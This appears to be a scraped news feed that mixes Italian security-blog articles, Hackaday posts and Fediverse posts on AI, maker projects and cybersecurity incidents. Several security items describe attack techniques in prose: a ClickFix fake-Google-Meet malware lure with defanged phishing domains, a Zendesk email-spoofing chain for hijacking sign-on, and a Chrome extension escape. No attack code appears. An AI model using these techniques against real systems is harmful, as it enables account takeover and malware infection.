Recentemente, Jensen Huang, CEO di Nvidia, è stato ospite del talk show Bg2 Pod, dove ha discusso vari argomenti legati all’intelligenza artificiale (IA), con un focus particolare sull’evoluzione verso l’intelligenza artificiale generale (AGI). Durante la conversazione con i conduttori Brad Gerstner e Clark Tang, Huang ha evidenziato la rapida evoluzione della tecnologia IA e il potenziale degli assistenti AGI, che si prevede diventeranno sempre più sofisticati nel tempo.

Huang ha messo in risalto la leadership di Nvidia nel campo dell’informatica, sottolineando i vantaggi competitivi ottenuti attraverso la riduzione dei costi di elaborazione e l’innovazione dell’architettura hardware. Ha descritto il “fossato” di Nvidia come un ecosistema software e hardware di lungo periodo, rendendo difficile per i concorrenti superare l’azienda solo con miglioramenti singoli nei chip.

youtube.com/embed/bUrCR4jQQg8?…

Inoltre, Huang ha lodato xAI di Elon Musk per il rapido completamento del super cluster di Memphis, che utilizza 100.000 GPU. Ha definito questo risultato come “senza precedenti” e ha riconosciuto il ruolo cruciale che questo cluster avrà nell’inferenza e nell’addestramento dell’IA, posizionandosi come uno dei supercomputer più veloci al mondo.

Riguardo all’impatto dell’IA sulla produttività, Huang ha mostrato ottimismo, affermando che l’IA migliorerà l’efficienza aziendale e non porterà a una disoccupazione massiccia. Ha sottolineato la necessità di garantire la sicurezza nello sviluppo e nell’uso della tecnologia, affinché i benefici siano vantaggiosi per la società nel suo complesso.

Huang ha quindi approfondito il concetto di AGI, descrivendo un assistente personale che impara e migliora nel tempo, rendendo la tecnologia utile fin dall’inizio, anche se non perfetta. Ha affermato che il tasso di cambiamento nel campo dell’IA sta accelerando in modo senza precedenti, portando a innovazioni che superano la tradizionale Legge di Moore.

Inoltre, ha discusso della natura dell’apprendimento automatico, affermando che non si tratta solo di migliorare i chip, ma di ottimizzare l’intero processo di elaborazione dei dati. Secondo Huang, il successo nell’IA richiede di considerare ogni passaggio del processo di apprendimento automatico come parte di un volano che deve essere accelerato.

Infine, Huang ha riflettuto sul vantaggio competitivo di Nvidia, sottolineando che l’azienda ha costruito un ecosistema completo che combina hardware, software e applicazioni. Ha affermato che, a differenza di altre aziende, Nvidia ha sviluppato una libreria specifica per il dominio che ha rivoluzionato il deep learning, evidenziando l’importanza di una comunicazione efficace tra la scienza e l’architettura sottostante.

L'articolo Jensen Huang: L’AGI sta arrivando! Scopriamo le nuove frontiere di Nvidia proviene da il blog della sicurezza informatica.

RC cars used to be pretty simple. They’d go forwards, backwards, and steer if you got a full-function toy. However, with modern technology, it’s pretty trivial to make them more advanced. [Stuck at Prototype] demonstrates that nicely with his little Micro Racer Cars.

Each little RC car has its own ESP32 running the show, hooked up with a motor controller running a small DC gear motor at each wheel. Power is from a lithium-polymer battery on board the car, which is charged via USB C. 3D-printed components form the chassis and body of the vehicle. [Stuck at Prototype] set the cars up so they could be controlled via a smartphone app, or via a custom RC controller of his own design. He liked the latter solution after he realized how hard apps were to maintain. He also gave the cars a little color sensor so they could detect color patches on the ground, so they could change their behavior in turn. This was to create gameplay like Mario Kart, where hitting a color patch might make the car go fast, go slow, or spin out.

The video goes into great detail about everything these tiny tabletop racers can do. The racer cars were initially intended to be a Kickstarter funded project, but it never quite reached its goal. Instead, [Stuck at Prototype] decided to release the designs online instead, putting the relevant files on Github.

We’ve seen some other neat RC projects before, too. Video after the break.

youtube.com/embed/6jzG-BMannc?…

[Thanks to Hari Wiguna for the tip!]

hackaday.com/2024/10/18/little…

Questa settimana, Europol ha ospitato la comunità mondiale delle forze dell'ordine e l'industria della #cybersicurezza al suo quartier generale, in concomitanza con il mese internazionale di sensibilizzazione sulla sicurezza informatica.

La settimana si è incentrata sulla Conferenza europea sulla criminalità informatica e ha segnato il 10° anniversario della task force congiunta sulla criminalità informatica (J-CAT).
La conferenza europea sulla criminalità informatica, aperta dal 16 al 17 ottobre, ha fornito una piattaforma per discutere le ultime tendenze e sfide della criminalità informatica. Hanno partecipato più di 460 rappresentanti di 82 paesi, tra cui funzionari delle forze dell'ordine, esperti di sicurezza informatica e rappresentanti dell'industria, tutti concentrati sul rafforzamento della sicurezza e della resilienza dell'Europa di fronte alle crescenti minacce informatiche.

La conferenza di quest'anno ha rappresentato cinque elementi tematici chiave:
- Operazioni di impatto: mostrando le recenti operazioni internazionali di contrasto, questo blocco ha evidenziato i metodi di individuazione, indagine e di interruzione impiegati per affrontare il crimine informatico.
- L'accesso ai dati per la rapida interruzione: Questo blocco ha esplorato le opportunità di accesso ai dati ed ha esaminato gli ostacoli giuridici, politici e tecnici che incidono sull'individuazione, l'indagine e l'interruzione delle minacce informatiche.
- Sfide future contro la criminalità informatica: Incentrato sull'anticipazione delle prossime sfide nel panorama della criminalità informatica, questo blocco ha sottolineato la necessità di continuare ad avanzare le minacce e le possibili soluzioni. - I 10 anni di realizzazione operativa di #J-CAT: In occasione del 10° anniversario della J-CAT, questo blocco si rifletteva sulla creazione della task force, sui primi casi chiave, sulle priorità attuali e sulla direzione futura.
- Sfruttare la tecnologia per indagini di successo: l'ultimo blocco ha esaminato come le tecnologie emergenti, come l'intelligenza artificiale, possano essere sfruttate nella lotta contro la #criminalitàinformatica.

#europol
@Notizie dall'Italia e dal mondo

You normally think of smart glasses as something you wear as either an accessory or, if you need a little assistance, with corrective lenses. But [akhilnagori] has a different kind of smart eyewear. These glasses scan and read text in the user’s ear.

This project was inspired by a blind child who enjoyed listening to stories but could not read beyond a few braille books. The glasses perform the reading using a Raspberry Pi Zero 2 W and a machine learning algorithm.

The original software developed took place on a Windows machine using WSL to simplify portability to the Linux-based Raspberry Pi board.

The frame is 3D printed, of course. Mounting the CPU, a camera, and a battery, along with a DC to DC converter, is fairly trivial. The real heavy lifting is in the software. The glasses snap a picture every ten seconds. It might be interesting to add a button or other means to let the user trigger a scan.

Of course, you could build something similar to run on just about any device with a camera and Python. It would be easy, for example, to put something in a hand-held format.

OCR is a readily solved problem. There are commercial smart glasses that look nice, and we wonder if any will have similar apps for them.

hackaday.com/2024/10/18/smart-…

Forming complex shapes in metal sheets is still a laborious process, especially if you aren’t needing more than a couple parts so stamping doesn’t make sense. That may change with Digital Sheet Forming.

While this video is basically an ad for one vendor’s approach, it gives a good set of examples of what the technique can achieve. The high pressure mechanism of the machine presses the metal layer by layer down against a silicone backing to form what you’ve designed, in this case, the nose cone for a Tucker Carioca.

Some people will decry it killing the metal forming industry, but as [Rob Ida] says in the video, it will allow metal formers to become more efficient at the work they do by taking out the tedium and letting them focus on the parts of the process requiring the most skill. Anyone who’s done any work with a 3D printer or CNC mill will know that sending a file to a machine is only one small part of the process.

We’re anxious to see this technology make its way to the makerspace and home shop. If you want to do some sheet metal forming now, why not try hydroforming?

youtube.com/embed/ou5wPy56B3I?…

hackaday.com/2024/10/18/cnc-me…

Imagine you’ve got an FM transmitter located some place. Wouldn’t it be mighty convenient if you could control that transmitter remotely? That way, you wouldn’t have to physically attend to it every time you had to change some minor parameters! To that end, [Ricardo Lima Caratti] built a rig to do just that.

The build is based around the QN8066—a digital FM transceiver built into a single chip. It’s capable of transmitting and receiving anywhere from 60 MHz to 108 MHz, covering pretty much all global FM stereo radio bands. [Ricardo] paired this chip with an ESP32 for command and control. The ESP32 hosts an HTTP server, allowing the administration of the FM transmitter via a web browser. Parameters like the frequency, audio transmission mode, and Radio Data Service (RDS) information can be controlled in this manner.

It’s a pretty neat little build, and [Ricardo] demonstrates it on video with the radio transmitting some field day content. We’ve seen some other nifty FM transmitters over the years, too. Video after the break.

youtube.com/embed/IFOy-DizVIk?…

hackaday.com/2024/10/18/fm-tra…

As hackers, we’re always pulling stuff apart—sometimes just to see what it’s like inside. Most of us have seen the inside of a computer, television, and phone. These are all common items that we come into contact with every day. Fewer of us have dived inside real spacey satellite hardware, if only for the lack of opportunity. Some good gear has landed on [Don]’s desk over the years though, so he got to pulling it apart and peering inside.

[Don] starts us off with a gorgeous… box… of some sort from Hughes Aircraft. He believes it to be from their Space & Communications group, and it seems to have something to do with satellite communications work. Externally, he gleans that it takes power and data hookups and outputs RF to, something… but he’s not entirely sure. Inside, we get a look at the old 90s electronics — lots of through hole, lots of big chunky components, and plenty of gold plating. [Don] breaks down the circuitry into various chunks and tries to make sense of it, determining that it’s got some high frequency RF generators in the 20 to 40 GHz range.

Scroll through the rest of [Don]’s thread and you’ll find more gems. He pulls apart a microwave transmitter from Space Micro — a much newer unit built somewhere around 2008-2011. Then he dives into a mysterious I/O board from Broad Reach, and a very old Hughes travelling wave tube from the 1970s. The latter even has a loose link to the Ford Motor Company, believe it or not.

Even if you don’t know precisely what you’re looking at, it’s still supremely interesting stuff—and all very satellite-y. We’ve seen some other neat satellite gear pulled apart before, too. Meanwhile, if you’ve been doing your own neat teardowns, don’t hesitate to let us know!

hackaday.com/2024/10/18/teardo…

This summer, I was pleasantly surprised when a friend of mine from Chicago turned up at one of the hacker camps I attended. A few days of hanging out in the sun ensued, doing cool hacker camp stuff, drinking unusual beverages, and generally having fun. It strikes me as a shame that this is such a rare occurrence, and since Hackaday is an American organisation and I am in a sense writing from its European outpost, I should do what I can to encourage my other friends from the USA and other parts of the world to visit. So here I’m trying to write a hacker’s guide to visiting Europe, in the hope that I’ll see more of you at future camps and other events.

It’s Intimidating. But Don’t Worry.

Yes. We’d find this intimidating, too. Bewitchedroutine, Public domain.
First of all, I know that it’s intimidating to travel to an unfamiliar place where the language and customs may be different. I’m from England, which sits on a small island in the North Atlantic, and believe it or not it’s intimidating for us to start traveling too. It involves leaving the safety of home and crossing the sea whether by flight, ferry, or tunnel, and that lies outside one’s regular comfort zone.

Americans live in a country that’s almost a continent in its own right, so you can satisfy your travel lust without leaving home. Thus of course the idea of landing in Germany or the Netherlands is intimidating. But transatlantic flights are surprisingly cheap in the scheme of international travel because of intense competition, so I’m here to reassure you that you can travel my continent ‘s hacker community without either feeling out of your depth, or breaking the bank.

What About The Language Barrier?

Let’s start with the language. I’m a British English speaker, je parle Francais, een beetje Nederlands, and ein bischien Deutsch. (Ed note: errors left intact for authenticity.) The fact is though, while it’s nice to try my halting Dutch to buy a portion of haring en uitjes, the truth is I rarely find myself completely lost in my travels through the hacker community on just my native language. It may annoy the French to call English a lingua franca, but if you’re an Anglophone you’ve lucked out in having the international glue language at your fingertips. It’s the default translation when traveling, in major cities you will usually find people who speak it when you need to. Meanwhile we’re lucky enough that there are few cities which don’t have some form of hackerspace, so you can usually find someone friendly with local knowledge if you need a bit of advice.

So It’s Not As Scary As You Think, But Why Come Here?

Different countries take it in turns to host the year’s largest hacker camp. This is SHA2017, in the Netherlands.
From here in Europe we look over the Atlantic at events like Def Con with some envy, but the fact is that Americans do things a little differently from us. Those events are expensive, while for us a summer hacker event is a community led affair in a field with camping thrown in. Some of the tickets are a few hundred dollars, but that’s it, no hotels, just camping in a field with five thousand other hackers.

Even better, the smaller events are cheaper, and often have much more charm as they aren’t so overwhelming. I can afford to do more than one, because they don’t cost an outrageous amount, and if I work out my timing I can even travel from one to the next without needing anywhere to stay over, instead helping with set-up and teardown. Add to that those hundreds of hackerspaces in cities only a relatively short distance apart, and there’s a lot to see.

Getting Around Needn’t Bankrupt You

Getting around with eurail is as simple as selecting your journey, and boarding the train.
One of the great holidays of the world remains the Great North American Road Trip. Grab a car with a couple of friends, and head out across the wide open spaces on the roads less traveled. Eat at Mom-n-Pop roadside diners in flyspeck towns, and enjoy what the continent has to offer under that endless sky. But while hire cars and gasoline may be cheap in the USA, long distance driving is tedious, so Americans prefer to fly.

Europe is different, hire cars are expensive, gasoline is eye-wateringly expensive, and while budget flights can be cheap, they really are a royal pain in the ass. Fortunately our continent is still cris-crossed by an extensive passenger rail network, and while individual tickets can be expensive there’s a very handy hack that makes them a great choice for a tourist. It’s called the eurail pass, originally designed for young people but now available for all ages, and it offers universal access for visitors to the whole continent’s rail network.

Taking a train from Paris to Copenhagen is simply a case of punching the journey into the app, and doing it with 180 mph high-speed trains instead of slower regional trains usually only takes a few Euros extra booking fee. If you’ve ever wondered how I write about events all over Europe for Hackaday I can reveal that there’s no diamond-encrusted expense account, instead I use the domestic European version of this pass. It’s that good.

Where To Stay

BornHack is one of the smaller European hacker camps, offering a week in a Danish forest.
If you are coming over for a hacker camp, there’s your campsite and event all rolled into one, but outside the camps there are still some affordable options. Starting with camping, for us it’s not the backwoods facilities of a trailhead camping spot but in most cases a commercial camp site. For not a huge a mount of money you’ll get toilets and showers along with your pitch, and even a 230V CEE-form power hook-up if you’re prepared to pay extra.

I’ve written Hackaday articles in more than one camp site in my time. Then if you have a eurail pass it’s worth noting that Europe has a night train network. If it’s a conventional sit-up train you might not have the most comfortable night, but for the extra cost of a sleeper berth you can swallow up the journey in comfort and have the day to do more interesting stuff. Then as everywhere it’s easy to find a hotel, I tend to aim for non-tourist-destination train stops and find a two-star room for about 50 to 70 Euros when I need one. And after a few nights camping and night training, you will need one. Finally as you wander around our continent’s hackerspaces you may find the occasional offer of a sofa for the night, but remember that most European houses are tiny and the etiquette around staying over may be a little different. Only expect to stay for a while and use someone’s place as a base if they really know you.

Day To Day

Try the local fast food, you won’t regret it. C van der, CC BY 2.0.
It’s possible to exist in many European cities using small-denomination cash in whatever the local currency is, and shopping in ancient markets for exotic ingredients. It’s fun, even. But Europeans shop at the same shops and supermarkets as anyone else, and your Mastercard will work here too.

Look out for budget supermarkets, Aldi, Lidl, or Netto if you’re on a shoestring, and Primark if you’re in need of clothing. Meanwhile eating out can be expensive, and we don’t have a tradition of eating out for breakfast. We have McDonalds, Burger King, and KFC here just like anywhere else, but seek out the local fast food, it’s worth it.

European Hackerspaces

Wrapping it up, if you’re an American you may not be used to most hackerspaces only being a few tens of miles from each other. As a member of several European spaces it’s great to have international visitors drop by, so please, check out online when you go somewhere, find the space, and give them a shout. I have drunk Club-Mate and eaten a variety of delicacies while sitting on shabby sofas in the company of my peers continent-wide, and if you’re One of Us and looking to get to know a country there’s no better way.

So. The Hackaday Tourist Guide has spoken, are we going to see you at a European event next summer?

Header: NASA, public domain.

hackaday.com/2024/10/18/a-hack…

This week on the Podcast, Hackaday’s Elliot Williams and Kristina Panos joined forces to bring you the latest news, mystery sound, and of course, a big bunch of hacks from the previous week.

First up in the news: we’ve extended the 2024 Supercon Add-On contest by a week! That’s right, whether you were held up by Chinese fall holidays or not, here’s your chance to get in on this action.

We love to see the add-ons people make for the badge every year, so this time around we’re really embracing the standard. The best SAOs will get a production run and they’ll be in the swag bag at Hackaday Europe 2025.

What’s That Sound pretty much totally stumped Kristina once again, although she kind of earned a half shirt. Can you get it? Can you figure it out? Can you guess what’s making that sound? If you can, and your number comes up, you get a special Hackaday Podcast t-shirt.

Then it’s on to the hacks, beginning with what actually causes warping in 3D prints, and a really cool display we’d never heard of. Then we’ll discuss the power of POKE when it comes to live coding music on the Commodore64, and the allure of CRTs when it comes to vintage gaming. Finally, we talk Hackaday comments and take a look at a couple of keyboards.

Check out the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!

html5-player.libsyn.com/embed/…

Download in DRM-free MP3 and savor at your leisure.

Where to Follow Hackaday Podcast

Places to follow Hackaday podcasts:

• iTunes
• Spotify
• Stitcher
• RSS
• YouTube
• Check out our Libsyn landing page

Episode 293 Show Notes:

News:

• Breaking News: 2024 Supercon SAO Contest Deadline Extended

What’s that Sound?

• Know that sound? Submit your answer for a chance at a Hackaday Podcast T-Shirt.

Interesting Hacks of the Week:

• What Actually Causes Warping In 3D Prints?
  
  • A Technique To Avoid Warping On Large 3D Prints

  
  

• Have You Heard Of The Liquid Powder Display?
• A Phone? A Ham Radio? Relax! It’s Both!
• Symbolic Nixie Tubes Become Useful For Artistic Purposes
• Linus Live-Codes Music On The Commodore 64
• Are CRT TVs Important For Retro Gaming?
  
  • Pixel Art And The Myth Of The CRT Effect

  
  

Quick Hacks:

• Elliot’s Picks:
  
  • Arduboy Cassette Award Explores New Features
  • An Arduino Triggers A Flash With Sound
  • Your Battery Holder Is Also Your Power Switch With ToggleSlot

  
  

• Kristina’s Picks:
  
  • Mapping A Fruit Fly’s Brain With Crowdsourced Research
  • Portable Pi Palmtop Provides Plenty
  • Using The 555 For Everything

  
  

Can’t-Miss Articles:

• If You Can’t Say Anything Nice
• Keebin’ With Kristina: The One With The Folding Butterfly Keyboard

hackaday.com/2024/10/18/hackad…

The double-slit experiment, first performed by [Thomas Young] in 1801 provided the first definitive proof of the dual wave-particle nature of photons. A similar experiment can be performed that shows diffraction at optical frequencies by changing the reflectivity of a film of indium-tin-oxide (ITO), as demonstrated in an April 2024 paper (preprint) by [Romain Tirole] et al. as published in Nature Physics. The reflectivity of a 40 nm thick film of ITO deposited on a glass surface is altered with 225 femtosecond pulses from a 230.2 THz (1300 nm) laser, creating temporal ‘slits’.
Interferogram of the time diffracted light as a function of slit separation (ps) and frequency (THz). (Credit: Tirole et al., Nature Physics, 2024)
The diffraction in this case occurs in the temporal domain, creating frequencies in the frequency spectrum when a separate laser applies a brief probing pulse. The effect of this can be seen most clearly in an interferogram (see excerpt at the right). Perhaps the most interesting finding during the experiment was how quickly and easily the ITO layer’s reflectivity could be altered. With ITO being a very commonly used composition material that provides properties such as electrical conductivity and optical transparency which are incredibly useful for windows, displays and touch panels.

Although practical applications for temporal diffraction in the optical or other domains aren’t immediately obvious, much like [Young]’s original experiment the implications are likely to be felt (much) later.

Featured image: the conventional and temporal double-slit experiments, with experimental setup (G). (Credit: Tirole et al., Nature Physics, 2024)

hackaday.com/2024/10/18/double…

Raccoon for Friendica (actually there is also a Raccon for Lemmy app) is an amazing app and, although it is still in “beta” version (the installation file can be downloaded here), it seems like a completely mature app, full of innovations and, surprisingly, it even manages to offer something completely new to Mastodon users! NB: This is an automatic translation from Italian.

Source

informapirata

2024-10-18 14:26:40

Raccoon, the Friendica app that also has surprises for Mastodon users (automatic translation from Italian)

Oh yes! #RaccoonForFriendica is the most complete app ever seen for Friendica and, in addition to working with Mastodon, it might be the only app in the world capable of managing the potential of Mastodon Glitch-soc

informapirata.it/2024/10/18/ra…

#Friendica #Glitch #Poliversity #Poliverso #Raccoon #RaccoonForFriendica

informapirata.it/2024/10/18/ra…

Raccoon, the Friendica app that also has surprises for Mastodon users (automatic translation from Italian)

Oh yes! #RaccoonForFriendica is the most complete app ever seen for Friendica and, in addition to working with Mastodon, it might be the…

^{informapirata}

ESET ha negato le accuse secondo cui i suoi sistemi sarebbero stati compromessi dopo che lo specialista della sicurezza Kevin Beaumont ha rivelato una campagna malevola che sembrava essere effettuata utilizzando l’infrastruttura ESET.

Secondo il blog di Beaumont, uno dei dipendenti dell’azienda israeliana è rimasto vittima del malware dopo aver aperto un collegamento in un’e-mail presumibilmente inviata dal team ESET Advanced Threat Defense in Israele. L’email ha superato con successo i controlli DKIM e SPF per il dominio ESET, ma Google Workspace l’ha contrassegnata come pericolosa.

L’attacco è stato registrato l’8 ottobre ed era mirato a specialisti della sicurezza informatica in Israele. Il file dannoso è stato distribuito attraverso i server di ESET, con i destinatari che venivano avvertiti che l’attacco era stato effettuato da un aggressore “sostenuto dallo Stato”. Le vittime sono state inoltre incoraggiate a prendere parte al programma ESET Unleashed, che in realtà non esiste come iniziativa separata, sebbene sia menzionato nel marchio dell’azienda.

Il ricercatore ha trovato diverse DLL ESET e un file setup.exe dannoso nel file scaricato. Beaumont ha descritto il programma come un falso virus ransomware che imita il lavoro del famoso malware Yanluowang. Beaumont ha inoltre notato che i file sui dispositivi non possono essere recuperati perché si tratta di un Viper .

Durante l’esecuzione, il malware ha contattato anche un’organizzazione legata all’Iron Swords War Day, dedicato alla memoria delle vittime dell’attacco del 7 ottobre 2023. I fatti suggeriscono il possibile coinvolgimento di hacktivisti.

ESET ha negato la versione di Beaumont sull’hacking dell’ufficio israeliano dell’azienda. L’azienda ha sottolineato che l’incidente ha colpito un’organizzazione partner in Israele e che la campagna dannosa è stata bloccata in 10 minuti. ESET ha assicurato di aver bloccato con successo la minaccia e che i clienti sono al sicuro. La società ha inoltre confermato che sta collaborando con il proprio partner alle indagini e continua a monitorare la situazione.

La fonte dell’attività dannosa non è stata ancora identificata, ma i metodi utilizzati nell’attacco sono simili alle tattiche del gruppo filo-palestinese Handala. I ricercatori di Trellix hanno precedentemente riferito che Handala sta utilizzando attivamente dei dropper per attaccare le organizzazioni israeliane, rilevando centinaia di incidenti nell’arco di diverse settimane nel mese di luglio.

L'articolo Cyber-Attacco a ESET: Realtà o Falsa Accusa? Potrebbe esserci dietro il gruppo Handala proviene da il blog della sicurezza informatica.

Kevin Beaumont

2024-10-17 22:18:27

Okay, ESET Israel definitely got compromised, this thing is fake ransomware that talks to an Israeli news org server for whatever reason.

Raccoon for Friendica (in effetti c’è anche un’app Raccon for Lemmy) è un’app sorprendente e, benché sia ancora in versione “beta” (il file di installazione può essere scaricato qui), sembra un’app completamente matura, ricca di innovazioni e, sorprendentemente, riesce addirittura a offrire qualcosa di completamente nuovo agli utenti Mastodon! Abbiamo deciso perciò di scrivere questo…

Source

informapirata

2024-10-18 13:37:38

Raccoon, l’app Friendica che riserva sorprese anche per gli utenti Mastodon

#RaccoonForFriendica è l’app più completa mai vista finora per Friendica e, oltre a funzionare anche con Mastodon, potrebbe essere l’unica app al mondo in grado di gestire le potenzialità di Mastodon Glitch-soc

informapirata.it/2024/10/18/ra…

#Friendica #Mastodon #Poliversity #Poliverso #Raccoon #RaccoonForFriendica

informapirata.it/2024/10/18/ra…

Raccoon, l’app Friendica che riserva sorprese anche per gli utenti Mastodon

#RaccoonForFriendica è l'app più completa mai vista finora per Friendica e, oltre a funzionare anche con Mastodon, potrebbe essere l'unica app al mondo…

^{informapirata}

Depending on who you ask, the big news this week is that quantum computing researchers out of China have broken RSA. And that’s true… sort of. There are multiple caveats, like the fact that this proof of concept is only factoring a 22-bit key. The minimum RSA size in use these days is 1024 bits. The other important note is that this wasn’t done on a general purpose quantum computer, but on a D-Wave quantum annealing machine.

First off, what is the difference between a general purpose and annealing quantum computer? Practically speaking, a quantum annealer can’t run Shor’s algorithm, the quantum algorithm that can factory large prime numbers in much sorter time than classical computers. While it’s pretty certain that this algorithm works from a mathematical perspective, it’s not at all clear that it will ever be possible to build effective quantum computers that can actually run it for the large numbers that are used in cryptography.

We’re going to vastly oversimplify the problem, and say that the challenge with general purpose quantum computing is that each q-bit is error prone, and the more q-bits a system has, the more errors it has. This error rate has proved to be a hard problem. The D-wave quantum annealing machine side-steps the issue by building a different sort of q-bits, that interact differently than in a general purpose quantum computer. The errors become much less of a problem, but you get a much less powerful primitive. And this is why annealing machines can’t run Shor’s algorithm.

The news this week is that researchers actually demonstrated a different technique on a D-wave machine that did actually factor an RSA key. From a research and engineering perspective, it is excellent work. But it doesn’t necessarily demonstrate the exponential speedup that would be required to break real-world RSA keys. To put it into perspective, you can literally crack a 22 bit RSA key by hand.

Zendesk Out of Scope

Here’s an example of two things. First off, a bug being out of scope for a bounty shouldn’t stop a researcher from working on a bug. Second, it’s worth being extra careful in how a bug bounty’s scope is set up, as sometimes bugs have unforeseen consequences. We’re talking here about Zendesk, a customer support tool and ticket manager. [Daniel] found an issue where an attacker could send an email to the support email address from a spoofed sender, and add an arbitrary email address to the ticket, gaining access to the entire ticket history.

Because the problem was related to email spoofing, and the Zendesk bounty program on HackerOne considers “SPF, DKIM, and DMARC” to be out of scope, the ticket was closed as “informative” and no bounty awarded. But [Daniel] wasn’t done. What interesting side effects could he find? How about triggering single sign on verification to go to the support email address? Since an Apple account can be used to sign on to slack, an attacker can create an apple account using the support email address, use the email spoof to get access to the created bug, and therefore the one-time code. Verify the account, and suddenly you have an Apple account at the target’s domain. [Daniel] used this to gain access to company Slack channels, but I’d guess this could be used for even more mayhem at some businesses.

Given that the original bug report was closed as “informational”, [Daniel] started reporting the bug to other companies that use Zendesk. And it paid off, netting more than $50,000 for the trouble. Zendesk never did pay a bounty on the find, but did ask [Daniel] to stop telling people about it.

Fortinet Fixed It

The good folks at Watchtowr Labs have the inside scoop on a recently fixed vulnerability in Fortinet’s FortiGate VPN appliance. It’s a good fix found internally by Fortinet, and gives us a good opportunity to talk about a class of vulnerability we haven’t ever covered. Namely, a format string vulnerability.

The printf() function and its siblings are wonderful things. You give it a string, and it prints it to standard output. You give it a string that contains a format specifier, like %s, and it will replace the specifier with the contents of a variable passed in as an additional argument. I write a lot of “printf debugging” code when trying to figure out a problem, that looks like printf("Processing %d bytes!\n", length);

What happens if the specifier doesn’t match the data type? Or if there is a specifier and no argument? You probably know the answer: Undefined behavior. Not great for device security. And in this case, it does lead to Remote Code Execution (RCE). The good news is that Fortinet found this internally, and the fix was quietly made available in February. The bad news is that attackers found it, and have since been actively using it in attacks.

Escape!

[ading2210] has the story of finding a pair of attack chains in Google Chrome/Chromium, where a malicious extension can access the chrome://policy page, and define a custom “browser” command to use when accessing specific pages. There are two separate vulnerabilities that can be used to pull off this trick. One is a race condition where disallowed JS code can run before it’s disabled after a page reload, and the other is a crash in the page inspector view. That’s not a page non-developers have a habit of visiting, so the browser extension just pulls a fast one on install, launching a simple page that claims that something went wrong, asking the user to press f12 to troubleshoot.

ading.dev/blog/assets/chrome_s…

Multihomed Spoofing

At this point, most of us rely on Linux for our routers and firewalls. Whether you realize it or not, it’s extremely likely that that little magical box that delivers Internet goodness to your devices is a Linux machine, running iptables as the firewall. And while iptables is excellent at its job, it does have its share of quirks. Researchers at Anvil have the low down on ESTABLISHED connection spoofing.

Iptables, when run on the boarder between networks, is often set to block incoming packets by default, and allow outgoing. The catch is that you probably want responses to your requests. To allow TCP connections to work both ways, it’s common to set iptables to allow ESTABLISHED connections as well. If the IP addresses and ports all match, the packet is treated as ESTABLISHED and allowed through. So what’s missing? Unless you explicitly request it, this firewall isn’t checking that the source port is the one you expected. Packets on one interface just might get matched to a connection on a different interface and passed through. That has some particularly interesting repercussions for guest networks and the like.

Bits and Bytes

On the topic of more secure Linux installs, [Shawn Chang] has thoughts on how to run a container more securely. The easy hint is to use Podman and run rootless containers. If you want even tighter protection, there are restrictions on system calls, selinux, and a few other tricks to think about.

Check the logs! That’s the first step to looking for a breach or infection, right? But what exactly are you looking for? The folks at Trunc have thoughts on this. The basic idea is to look for logins that don’t belong, IPs that shouldn’t be there, and other specific oddities. It’s a good checklist for trouble hunting.

And finally, the playlist from DEF CON 32 is available! Among the highlights are [Cory Doctorow] talking about the future of the Internet, [HD Moore] and [Rob King] talking about SSH, and lots lots more!

youtube.com/embed/videoseries?…

hackaday.com/2024/10/18/this-w…

Nelle nuove campagne ClickFix, i truffatori attirano gli utenti su false pagine di Google Meet dove vengono mostrati falsi errori di connessione per diffondere malware che possono infettare i sistemi Windows e macOS.

ClickFix risale a maggio, quando Proofpoint ne ha segnalato per la prima volta l’utilizzo da parte del gruppo TA571. Gli attacchi hanno utilizzato falsi messaggi di errore in Google Chrome, Microsoft Word e OneDrive. Alle vittime è stato chiesto di incollare il codice nella riga di comando di PowerShell per risolvere il presunto problema, che ha portato all’infezione dei loro dispositivi.

Malware come DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, Lumma Stealer e altri sono stati distribuiti attraverso questo metodo. Nel mese di luglio, McAfee ha riscontrato un aumento nella frequenza di questi attacchi, soprattutto negli Stati Uniti e in Giappone.

Secondo un nuovo rapporto di Sekoia, le tattiche di ClickFix sono recentemente cambiate, con gli aggressori che utilizzano falsi inviti di Google Meet e inviano e-mail di phishing mirate alle società di spedizione e logistica.

Nuovi trucchi includono pagine Facebook false e discussioni GitHub false.

Sekoia collega anche le recenti campagne a due gruppi, Slavic Nation Empire (SNE) e Scamquerteo, che si ritiene facciano parte dei gruppi truffatori di criptovaluta Marko Polo e CryptoLove.

Gli attacchi tramite Google Meet sembrano particolarmente convincenti: gli aggressori inviano e-mail con link falsi che imitano quelli ufficiali:

• incontra[.]google[.]noi-unisciti[.]com
• incontra[.]google[.]web-join[.]com
• incontra[.]googie[.]com-unisciti[.]a noi

Dopo aver visitato tali pagine, agli utenti viene mostrato un messaggio relativo a un presunto problema con il microfono o le cuffie. Un tentativo di “correggere” l’errore attiva lo script ClickFix standard: il codice PowerShell dannoso viene eseguito tramite la riga di comando, scaricando malware dal dominio “googiedrivers[.]com”.

Per i dispositivi Windows, viene scaricato Stealc o Rhadamanthys e su macOS, AMOS Stealer è installato nel formato “.DMG” chiamato “Launcher_v194“. Oltre a Google Meet, gli aggressori utilizzano anche altre piattaforme per distribuire malware, tra cui Zoom, falsi lettori PDF, videogiochi falsi e progetti web3.

L'articolo Il Malware ClickFix si evolve: Zoom e Google Meet si trasformano in strumenti di attacco proviene da il blog della sicurezza informatica.

These days, when something electronic breaks, most folks just throw it away and get a new one. But as hackers, we prefer to find out what the actual problem is and fix it. [Bonsembiante] took that very tack when a MOTU brand audio interface wasn’t booting. As it turns out, a bit of investigative work led to a simple and viable fix.

The previous owner had tried to get the unit fixed multiple times without success. When it ended up on [Bonsembiante]’s bench, reverse engineering was the order of the day. Based around an embedded Linux system, there was lots to poke and prod at inside, it’s just that… the system wasn’t booting, wasn’t showing up over USB or Ethernet, or doing much of anything at all.

Extracting the firmware only revealed that the firmware was actually valid, so that was a dead end. However, after some work following the boot process along in Ghidra, with some external help, the problem was revealed. Something was causing the valid firmware to fail the bootloader’s checks—and with that fixed, the unit booted. You’ll have to read the article to get the full juicy story—it’s worth it!

We’ve seen [Bonsembiante’s] work here before, when they turned an old ADSL router into a functioning guitar pedal. Video after the break.

youtube.com/embed/TRn4vVytfE4?…

hackaday.com/2024/10/18/motu-a…

Last December, we discovered a new group targeting Russian businesses and government agencies with ransomware. Further investigation into this group’s activity suggests a connection to other groups currently targeting Russia. We have seen overlaps not only in indicators of compromise and tools, but also tactics, techniques, and procedures (TTPs). Moreover, the infrastructure partially overlaps across attacks.

